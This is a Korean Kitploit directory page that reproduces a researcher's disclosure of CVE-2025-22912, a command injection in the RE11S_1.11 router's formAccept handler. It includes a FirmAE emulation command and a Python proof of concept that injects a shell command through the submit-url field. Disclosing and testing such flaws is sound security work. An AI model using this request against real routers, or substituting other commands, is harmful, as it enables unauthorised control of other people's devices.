Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
도구/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationFuzzingPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

저장소 보기
1년 전아직 검토되지 않음

RE11S_1.11-formAccept-CommandInjection

Qi An Xin Tiangong Lab에서 인턴십을 하는 동안 RE11S_1.11 라우터에서 명령 주입 취약점을 발견했습니다.

bin 디렉터리의 webs 파일을 분석한 결과, formAccept 함수에 명령 주입 취약점이 포함되어 있음을 발견했습니다.

명령 주입은 submit-url 키 값에 의해 트리거될 수 있으며, 이로 인해 시스템 명령 주입이 발생합니다.

image-20241224100434040

라우터를 어떻게 시뮬레이션할 수 있나요

firmAE로 시뮬레이션하려면 다음 명령을 사용하세요.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

poc.py 파일의 내용은 다음과 같습니다:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

공격 결과

image-20241224100515030

실행 후 /tmp/xyq 파일이 생성된 것을 확인할 수 있으며, 이는 공격이 성공했음을 증명합니다.

도구 다운로드